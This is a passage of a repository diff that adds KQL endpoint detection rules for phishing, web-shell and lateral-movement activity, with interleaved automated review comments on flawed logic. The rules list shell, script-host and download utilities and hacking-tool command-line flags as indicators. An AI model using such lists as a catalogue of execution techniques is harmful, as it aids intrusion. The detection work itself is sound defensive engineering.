+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-21
+// Level: medium
+// Description: Detects when the macOS Script Editor utility spawns an unusual child process.
+// MITRE Tactic: Initial Access
+// Tags: attack.t1566, attack.t1566.002, attack.initial-access, attack.t1059, attack.t1059.002, attack.t1204, attack.t1204.001, attack.execution, attack.persistence, attack.t1553, attack.defense-evasion
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/curl" or FolderPath endswith "/bash" or FolderPath endswith "/sh" or FolderPath endswith "/zsh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/osascript" or FolderPath endswith "/mktemp" or FolderPath endswith "/chmod" or FolderPath endswith "/php" or FolderPath endswith "/nohup" or FolderPath endswith "/openssl" or FolderPath endswith "/plutil" or FolderPath endswith "/PlistBuddy" or FolderPath endswith "/xattr" or FolderPath endswith "/sqlite" or FolderPath endswith "/funzip" or FolderPath endswith "/popen") or (FolderPath contains "python" or FolderPath contains "perl")) and InitiatingProcessFolderPath endswith "/Script Editor"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql b/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql
new file mode 100644
index 00000000..716880e7
--- /dev/null
+++ b/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql
@@ -0,0 +1,14 @@ +// Title: Suspicious File Created in Outlook Temporary Directory +// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-22 +// Level: high +// Description: Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments. +This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 +// False Positives: +// - Opening of headers or footers in email signatures that include SVG images or legitimate SVG attachments + +DeviceFileEvents +| where (FolderPath endswith ".cpl" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".rdp" or FolderPath endswith ".svg" or FolderPath endswith ".vba" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and ((FolderPath contains "\\AppData\\Local\\Packages\\Microsoft.Outlook_" or FolderPath contains "\\AppData\\Local\\Microsoft\\Olk\\Attachments\\") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\" and FolderPath contains "\\Content.Outlook\\")) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql b/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql new file mode 100644 index 00000000..983a2cee --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql 
@@ -0,0 +1,12 @@ +// Title: Suspicious File Write to SharePoint Layouts Directory +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-24 +// Level: high +// Description: Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation. +This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003 + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath contains "\\15\\TEMPLATE\\LAYOUTS\\" or FolderPath contains "\\16\\TEMPLATE\\LAYOUTS\\") and (FolderPath endswith ".asax" or FolderPath endswith ".ascx" or FolderPath endswith ".ashx" or FolderPath endswith ".asmx" or FolderPath endswith ".asp" or FolderPath endswith ".aspx" or FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cer" or FolderPath endswith ".config" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".jsp" or FolderPath endswith ".jspx" or FolderPath endswith ".php" or FolderPath endswith ".ps1" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\" or FolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\") \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql b/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql new file mode 100644 index 00000000..7ef5fc94 --- /dev/null 
+++ b/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious HWP Sub Processes
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-24
+// Level: high
+// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, attack.g0032
+
+DeviceProcessEvents
+| where FolderPath endswith "\\gbb.exe" and InitiatingProcessFolderPath endswith "\\Hwp.exe"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql b/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql
new file mode 100644
index 00000000..c0613ed3
--- /dev/null
+++ b/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql
@@ -0,0 +1,14 @@ +// Title: Suspicious LNK Command-Line Padding with Whitespace Characters +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-03-19 +// Level: high +// Description: Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D). +Adversaries insert non-printable whitespace characters (e.g., Line Feed \x0A, Carriage Return \x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary. +The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks. +This rule flags suspicious use of such padding observed in real-world attacks. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1204.002 + +DeviceProcessEvents +| where ((ProcessCommandLine contains " " or ProcessCommandLine contains "\\u0009" or ProcessCommandLine contains "\\u000A" or ProcessCommandLine contains "\\u0011" or ProcessCommandLine contains "\\u0012" or ProcessCommandLine contains "\\u0013" or ProcessCommandLine contains "\\u000B" or ProcessCommandLine contains "\\u000C" or ProcessCommandLine contains "\\u000D") or ProcessCommandLine matches regex "\\n\\n\\n\\n\\n\\n") and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessCommandLine contains ".lnk") \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql b/KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql new file mode 100644 index 00000000..4345d426 --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql 
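Review bot: The literals `"\\u0009"` through `"\\u000D"` are six-character strings (backslash, `u`, four hex digits) rather than the control characters the description talks about, so those `contains` clauses only fire when a command line literally contains the text `\u0009`; only the `matches regex "\\n\\n\\n\\n\\n\\n"` branch actually tests for real whitespace. A `matches regex` character class over the intended range (the description names 0x09–0x0D) would match the actual characters, and the `\\u0011`–`\\u0013` entries fall outside that range and are device-control codes rather than whitespace, which is worth confirming against the source rule. The first literal, `ProcessCommandLine contains " "`, appears on this page as a single space; if that is not a rendering artefact of a longer run of spaces, it matches virtually every command line and makes the whole `or` chain trivially true.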
@@ -0,0 +1,12 @@
+// Title: Suspicious Microsoft OneNote Child Process
+// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)
+// Date: 2022-10-21
+// Level: high
+// Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.
+// MITRE Tactic: Initial Access
+// Tags: attack.t1566, attack.t1566.001, attack.initial-access
+// False Positives:
+// - File located in the AppData folder with trusted signature
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\onenote.exe" and (((ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".pif" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd") and FolderPath endswith "\\explorer.exe") or ((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) and (not(((ProcessCommandLine endswith "-Embedding" and FolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and FolderPath endswith "\\FileCoAuth.exe") or (ProcessCommandLine endswith "-Embedding" and FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql b/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql
new file mode 100644
index 00000000..81f89dcd
--- /dev/null
+++ b/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious MSExchangeMailboxReplication ASPX Write
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\MSExchangeMailboxReplication.exe" and (FolderPath endswith ".aspx" or FolderPath endswith ".asp")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql b/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql
new file mode 100644
index 00000000..a82d0bcd
--- /dev/null
+++ b/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql
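Review bot: The `where` clause matches every `DeviceFileEvents` row attributed to the replication process, including `FileDeleted` and `FileRenamed` actions, although the description (and the ProxyShell web-shell drop it targets) is about writes; adding `and ActionType in ("FileCreated", "FileModified")` keeps the alert on the file write itself. The description also contains a typo, `.apsx` should read `.aspx`.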
@@ -0,0 +1,13 @@
+// Title: Suspicious Processes Spawned by Java.EXE
+// Author: Andreas Hunkeler (@Karneades), Florian Roth
+// Date: 2021-12-17
+// Level: high
+// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
+// False Positives:
+// - Legitimate calls to system binaries
+// - Company specific internal usage
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql b/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql
new file mode 100644
index 00000000..b7e7d5e8
--- /dev/null
+++ b/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Processes Spawned by WinRM
+// Author: Andreas Hunkeler (@Karneades), Markus Neis
+// Date: 2021-05-20
+// Level: high
+// Description: Detects suspicious processes including shells spawnd from WinRM host process
+// MITRE Tactic: Initial Access
+// Tags: attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation
+// False Positives:
+// - Legitimate WinRM usage
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql b/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql
new file mode 100644
index 00000000..affdbcc2
--- /dev/null
+++ b/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Shells Spawn by Java Utility Keytool
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2021-12-22
+// Level: high
+// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/terminal_service_process_spawn.kql b/KQL/rules/Initial Access/terminal_service_process_spawn.kql
new file mode 100644
index 00000000..57da8f94
--- /dev/null
+++ b/KQL/rules/Initial Access/terminal_service_process_spawn.kql
@@ -0,0 +1,10 @@
+// Title: Terminal Service Process Spawn
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-05-22
+// Level: high
+// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.lateral-movement, attack.t1210, car.2013-07-002
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains "\\svchost.exe" and InitiatingProcessCommandLine contains "termsvcs") and (not(((FolderPath endswith "\\rdpclip.exe" or FolderPath endswith ":\\Windows\\System32\\csrss.exe" or FolderPath endswith ":\\Windows\\System32\\wininit.exe" or FolderPath endswith ":\\Windows\\System32\\winlogon.exe") or isnull(FolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql b/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql
new file mode 100644
index 00000000..6bdfddf3
--- /dev/null
+++ b/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql
@@ -0,0 +1,12 @@
+// Title: User Added to Remote Desktop Users Group
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-06
+// Level: high
+// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.lateral-movement, attack.t1133, attack.t1136.001, attack.t1021.001
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql b/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql
new file mode 100644
index 00000000..462a905a
--- /dev/null
+++ b/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql
@@ -0,0 +1,12 @@
+// Title: Windows Registry Trust Record Modification
+// Author: Antonlovesdnb, Trent Liffick (@tliffick)
+// Date: 2020-02-19
+// Level: medium
+// Description: Alerts on trust record modification within the registry, indicating usage of macros
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+// - This will alert on legitimate macro usage as well, additional tuning is required
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords"
\ No newline at end of file
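Review bot: The TrustRecords query filters `DeviceRegistryEvents` on the key path only, so key creation, value deletion and key deletion under `TrustRecords` all fire alongside the value write that actually marks a document as trusted, which adds to the noise the false-positive note already warns about. If the intent is the Sigma "set value" semantics, restrict it with `| where ActionType =~ "RegistryValueSet" and RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords"`; verify against a sample event that the trust record surfaces as `RegistryValueSet` in your tenant before tightening.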
diff --git a/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql b/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql
new file mode 100644
index 00000000..84ea4948
--- /dev/null
+++ b/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql
@@ -0,0 +1,12 @@
+// Title: Copy From Or To Admin Share Or Sysvol Folder
+// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali
+// Date: 2019-12-30
+// Level: medium
+// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002
+// False Positives:
+// - Administrative scripts
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains " move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell_ise.exe" or FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.exe", "PowerShell.EXE", "pwsh.dll")))))
\ No newline at end of file
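Review bot: The admin-share branch `ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$"` repeats the same `contains "\\"` term twice, so it reduces to "any command line with a backslash and a dollar sign"; that looks like a lossy conversion of a `\\*$` wildcard and will match ordinary `copy C:\a %VAR$% ...`-style invocations, making the rule far noisier than the Sigma original. Replace the branch with an anchored pattern such as `ProcessCommandLine matches regex @"\\\\[^\\\s]+\\\w+\$"`, which requires a UNC host followed by a `C$`/`ADMIN$`-style share name. The rest of the clause (the copy-utility and PowerShell cmdlet branches) can stay as is.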
diff --git a/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql b/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql
new file mode 100644
index 00000000..8c969a5b
--- /dev/null
+++ b/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql
@@ -0,0 +1,11 @@
+// Title: HackTool - SharpMove Tool Execution
+// Author: Luca Di Bartolomeo (CrimpSec)
+// Date: 2024-01-29
+// Level: high
+// Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.
+
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\SharpMove.exe" or ProcessVersionInfoOriginalFileName =~ "SharpMove.exe") or ((ProcessCommandLine contains "action=create" or ProcessCommandLine contains "action=dcom" or ProcessCommandLine contains "action=executevbs" or ProcessCommandLine contains "action=hijackdcom" or ProcessCommandLine contains "action=modschtask" or ProcessCommandLine contains "action=modsvc" or ProcessCommandLine contains "action=query" or ProcessCommandLine contains "action=scm" or ProcessCommandLine contains "action=startservice" or ProcessCommandLine contains "action=taskscheduler") and ProcessCommandLine contains "computername=")
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql b/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql
new file mode 100644
index 00000000..338ee2a6
--- /dev/null
+++ b/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - WinRM Access Via Evil-WinRM
+// Author: frack113
+// Date: 2022-01-07
+// Level: medium
+// Description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.006
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-i " and ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ") and FolderPath endswith "\\ruby.exe"
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql b/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql
new file mode 100644
index 00000000..27dfae8a
--- /dev/null
+++ b/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql
@@ -0,0 +1,10 @@
+// Title: MMC Spawning Windows Shell
+// Author: Karneades, Swisscom CSIRT
+// Date: 2019-08-05
+// Level: high
+// Description: Detects a Windows command line executable started from MMC
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.003
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\mmc.exe" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe") or FolderPath contains "\\BITSADMIN")
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql b/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql
new file mode 100644
index 00000000..92aa7343
--- /dev/null
+++ b/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql
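Review bot: The description in the Evil-WinRM rule talks about logging in over the Remote Desktop Protocol, which contradicts both the title and the `attack.t1021.006` (WinRM) tag, so an analyst triaging the alert gets the wrong protocol; suggest `// Description: Detects execution of Evil-WinRM, a Ruby-based WinRM shell, via its characteristic "-i <host> -u <user> -p <password>" command-line flags.` The detection itself is only `-i `, `-u ` and `-p ` under any `ruby.exe`, so any Ruby script taking those switches will match; if the tool is normally launched as `ruby ... evil-winrm ...` in your environment, consider adding `ProcessCommandLine contains "evil-winrm"` as a tightening option, but confirm the launcher's command line first.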
@@ -0,0 +1,12 @@
+// Title: Mstsc.EXE Execution From Uncommon Parent
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-18
+// Level: high
+// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe")
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql
new file mode 100644
index 00000000..8e079b84
--- /dev/null
+++ b/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql
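Review bot: The description claims the rule looks for a local `.rdp` file in suspicious locations, but the `where` clause never inspects `ProcessCommandLine`; it only requires `mstsc.exe` to have been spawned by one of the listed browsers or Outlook, so the text misstates what an alert actually means. Suggest `// Description: Detects Mstsc.EXE being launched directly by a web browser or Outlook, which typically happens when a user opens a downloaded or mailed ".rdp" file.` so the comment matches the parent-process logic.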
@@ -0,0 +1,13 @@
+// Title: New Port Forwarding Rule Added Via Netsh.EXE
+// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel
+// Date: 2019-01-29
+// Level: medium
+// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate administration activity
+// - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)
+
+DeviceProcessEvents
